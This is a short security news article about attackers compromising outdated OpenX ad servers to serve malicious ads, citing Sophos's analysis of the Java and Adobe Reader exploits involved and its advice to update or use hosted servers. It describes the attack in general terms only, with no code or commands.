14 DAY TRIAL // Security researchers warn that hackers are compromising outdated OpenX servers in order to push malicious ads on other websites. The latest attack employs an exploit cocktail in an attempt to infect visitors with malware.
OpenX is an open source advertising server, which users willing to publish ads can download, install and maintain by themselves. The software is similar in concept to Google's AdSense, allowing owners to track clicks and view statistics about their advertising campaigns.
Running such a server and selling ad placement services might appeal to some people with the necessary resources. However, from a security perspective, such installations can be very dangerous if not updated regularly. This is because compromising an OpenX server instantly gives an attacker the opportunity to place malicious code on all websites loading ads from it, thus endangering a larger number of users.
The attack reported by Sophos is an example of a vulnerable Openx server being used to push malicious and obfuscated JavaScript code attached to an ad. This code leads to a second obfuscated script, which in turn redirects visitors to a third one.
The third script is part of an exploitation kit, which first performs several checks to determine what software is installed on a visitor's computer, and then loads the appropriate exploits to target the vulnerable applications. In this case, the exploits target outdated Java and Adobe Reader installations.
"Consistent with the recent rise we have reported in Java exploits, this attack involves malicious class files, targeting the HsbParser.getSoundBank vulnerability (CVE-2009-3867) and an old privilege escalation vulnerability in the handling of ZoneInfo objects during deserialization (CVE-2008-5353)," Fraser Howard, a senior virus researcher at Sophos, explains. Sophos' anti-malware products detect the Java exploits as Troj/BytVrfy-C and Troj/Clsldr-U, while the malicious PDF file as Troj/PDFJs-LE.
Mr. Howard advises OpenX server owners to consider a hosted solution if they are unable to keep their software up to date. According to him, the server compromised in this attack was running OpenX 2.8.0, while the latest version is 2.8.5.